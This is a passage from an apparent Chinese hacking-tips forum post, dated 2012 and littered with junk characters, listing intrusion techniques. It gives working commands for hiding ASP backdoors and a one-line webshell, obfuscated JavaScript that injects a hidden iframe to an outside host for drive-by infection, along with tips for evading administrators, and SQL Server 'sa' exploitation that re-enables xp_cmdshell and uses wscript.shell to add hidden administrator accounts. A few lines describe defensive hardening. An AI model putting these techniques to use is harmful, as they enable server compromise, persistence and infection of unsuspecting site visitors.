& J& q- N: O2 U6 V) L3 ?4 m# x! |用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
& |7 D4 z. `# ^' O; E) r% y: v6 c7 o( \ z
53、隐藏ASP后门的两种方法
6 B9 [+ O A1 K1 h6 r1、建立非标准目录:mkdir images..\3 f2 w) z! k% m2 L
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp3 h2 B/ B' P% X; v" N1 K, G
通过web访问ASP木马:http://ip/images../news.asp?action=login" ~& B" @& ]4 @" _+ p
如何删除非标准目录:rmdir images..\ /s. U9 Z" R$ M$ H5 B( n5 o% f
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
) ~8 v6 X) X5 d, R, f. Smkdir programme.asp4 [" Z2 b2 H' s; H5 {7 z( g
新建1.txt文件内容:<!--#include file=”12.jpg”-->8 N6 f; x* J F. G& q4 y# c3 j
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
7 k3 m. w, H1 _6 K' pattrib +H +S programme.asp
" a% M' T* z: Q' K! Z通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt w& p8 q* M7 Y) m( [0 v% Y
: u. u0 p/ t$ Y0 ]9 z
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
# W( W& P8 J8 a$ M然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
* w: o: n3 `( o- R0 q& R) [8 m% i+ G6 s2 z! v" R! B
55、JS隐蔽挂马9 Q( X, F& |9 _3 {! c5 k* [ B
1.8 w- @' v9 h; D
var tr4c3="<iframe src=ht";0 F. {/ j1 p3 Y9 G# F
tr4c3 = tr4c3+"tp:/";
% n4 c7 Q0 z B: A4 n8 Ltr4c3 = tr4c3+"/ww";# C$ y* ?3 s, j* h
tr4c3 = tr4c3+"w.tr4";
7 M& d6 B+ a2 f* Q3 j$ D$ ?( _tr4c3 = tr4c3+"c3.com/inc/m";1 i( k! @5 N, y' p6 O! y
tr4c3 = tr4c3+"m.htm style="display:none"></i";( f6 m, c( E1 Q: D+ W& [/ n
tr4c3 =tr4c3+"frame>'";
" ~, I$ t' V- b- H0 Ydocument.write(tr4c3); L/ w; W* M7 u; _
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
4 D& y8 S9 i7 o- i; q5 k
' L6 f/ U7 W- _8 C1 k. t f5 F2.
$ \2 O" h! Q0 Y2 i转换进制,然后用EVAL执行。如
3 y- V4 A7 E7 [/ @3 r8 Ceval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
7 n# _/ Y2 z. g不过这个有点显眼。
H x3 @) F# P% ?$ J3.6 a0 O% ], B( o& V+ ~* @
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');& t g8 f1 {2 \- ?) b4 O( t I! X
最后一点,别忘了把文件的时间也修改下。
: g' b2 W# \5 {- |& o6 ^5 I3 H( F M K
56.3389终端入侵常用DOS命令
# @4 k9 ^+ I8 m& b' F/ @, H* ttaskkill taskkill /PID 1248 /t/ q0 l! E ^+ O4 c3 }9 g- @. L
' E, g4 \* m' ~1 g5 q: x. ktasklist 查进程
6 D8 e( L4 ~ `
5 f0 x: d1 a Ecacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限* X3 P: n% N, i( K+ Y, m: d
iisreset /reboot
$ b( g' v5 I5 k! d* p/ ftsshutdn /reboot /delay:1 重起服务器
5 H' X$ |) J H1 X, {$ I ]8 e5 u4 e, o' D' J# ?1 a$ J) R
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
l/ d1 v' h/ b0 z
& K+ t0 C. K& A1 iquery user 查看当前终端用户在线情况
9 L5 [. u% R! n; z$ b- I+ H$ v4 o: }. b$ W6 T2 w8 `
要显示有关所有会话使用的进程的信息,请键入:query process *1 v! K7 V) @6 ^; N& i7 J
5 u# U5 Q9 k! N/ z3 v% f7 `要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
, m9 g8 p% n: L& s. M
' Y2 M' O8 G4 |! R/ c! J要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER29 ?8 c/ u9 m. e7 ~! B2 \
; P7 {5 A$ b. S# @7 ~- d7 l要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
- d) m7 Z' O1 |- n9 \- R; h: I
; ]( m3 f1 M. I0 q, H命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启* f( d- z. `" R6 u7 k2 f& b
/ N6 v: X( D) T9 x
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统. {8 C7 v+ t9 S' _& @
0 w2 o0 ^% c1 Y, d" F
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。: m6 `- R0 e: V! D& ?6 H
1 n! {3 l* m/ M2 l# {& b) m
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
$ M2 Y8 h/ a9 G4 x5 E7 D7 G/ a* B# q2 d4 @
56、在地址栏或按Ctrl+O,输入:
0 J. J! g9 H9 }( Ijavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s; h z, p6 E1 W+ O. w! I
2 _, v) H5 G9 L2 m0 Z9 l8 d2 X) B4 g源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
) m/ }+ p/ N+ a- ]: k' V8 u, _4 V( g) z2 H x7 G* Z
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,1 q, N' k" J6 X/ k* S; F/ y0 y1 J& s5 v
用net localgroup administrators是可以看到管理组下,加了$的用户的。
% l( l+ Q9 ? H; b% ?: J# w8 R4 x/ K
58、 sa弱口令相关命令
+ r7 w; g4 T. p/ |# a: r7 \ j: l
+ l" m2 a' D' Q$ l _一.更改sa口令方法: w A; m9 c7 j
用sql综合利用工具连接后,执行命令:
* w4 S7 [1 ]$ o0 b- o9 P1 vexec sp_password NULL,'20001001','sa'
4 e$ N% K \; }5 T(提示:慎用!)4 Z! k2 c5 B3 T V
H2 y. W. P: ^
二.简单修补sa弱口令.% r( Y- ~! W+ U T
5 U# c# q9 `- E! V% z
方法1:查询分离器连接后执行:
6 {& O" g; F& R( D6 Gif exists (select * from7 G% p4 S% v/ y$ G% k) ~( V
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and7 B& r' p2 J5 F$ n' A
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)/ p; d) m4 G4 |: t+ r7 B
4 \# E% x9 s* gexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
. B- _6 L; n. O x1 |5 e" i0 ~* E# i5 ~4 g2 G2 D
GO1 y/ Q2 s; I* b
0 ?2 b' Q7 L2 c- K3 ?- L然后按F5键命令执行完毕0 _" @6 ?1 k! e3 i! L2 d/ ~
) I8 F5 v4 {: J6 ~. G" j/ s, F2 I
方法2:查询分离器连接后
: p8 I7 Y/ s, R第一步执行:use master
, E, n4 v% g! J$ u第二步执行:sp_dropextendedproc 'xp_cmdshell'
, q+ Y$ T. [0 L+ w A" G9 C( z然后按F5键命令执行完毕. A1 o* z; J! h" u$ l9 P, u$ \+ y
* E5 a( `% @. R @+ [2 F
% k# X5 c! {+ N) I0 H' `三.常见情况恢复执行xp_cmdshell.
9 Y2 N/ m' {+ |( D
) \: Z5 H8 ~/ Z* g9 W k( B
3 u0 j3 \/ G/ h1 未能找到存储过程'master..xpcmdshell'.
\, f! }+ D9 O4 u 恢复方法:查询分离器连接后,$ l( H8 ?$ }- K) d* M3 C
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int' X/ j4 z7 t* i" q
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
& i3 X8 N8 w+ Q g5 z6 k然后按F5键命令执行完毕
/ M) F7 A% D$ U6 r: i0 ?6 {* _2 J$ B% H8 d9 Q6 c( H& _
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
0 ]/ |* H( V# v/ R6 G6 x恢复方法:查询分离器连接后,( O- O/ Z* {: W2 E
第一步执行:sp_dropextendedproc "xp_cmdshell"1 T" f; f* k, d: Y1 E3 x
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'+ D, R% U7 x# w7 F4 N: v5 W
然后按F5键命令执行完毕& N0 `( Q; z. ~
" c# d- G* G2 u! Y& m ~
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。), D7 O: K. |' J# K* b1 }0 K$ T
恢复方法:查询分离器连接后,
& }3 g7 z) R4 v* Z& S9 M2 u6 a第一步执行:exec sp_dropextendedproc 'xp_cmdshell'2 E( m- m( e3 h* o3 ?: N
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 1 Q7 g- a$ A7 L% a
然后按F5键命令执行完毕
# J5 G7 h6 y# p5 @
! P* u% Q# X* J! {四.终极方法.
0 q ]) P+ ]9 Y3 r: A: d( g如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
) H% S- J" n& M1 G S% Y% p查询分离器连接后,* b* ~9 f& O$ Z7 y- f
2000servser系统:
2 S! D9 @% S2 H# R- _0 cdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'7 l2 W" U$ `1 z1 _: D* k, l
2 D }) ^; |3 n$ h$ }2 Zdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add') v; y1 J' d5 G, }3 v
9 R# n+ ^/ v) Y2 k! `2 S0 C
xp或2003server系统:- I7 z M$ b# k/ {# O n
6 W% }. e2 }* X4 Z& jdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
' b& N: O$ ^" q8 C/ C1 v6 D
- @, x5 q) \' d8 l C0 k6 udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add' c4 H& ~& d& N. w6 ~
|
发表于 2012-9-15 14:13:15
收藏
支持
反对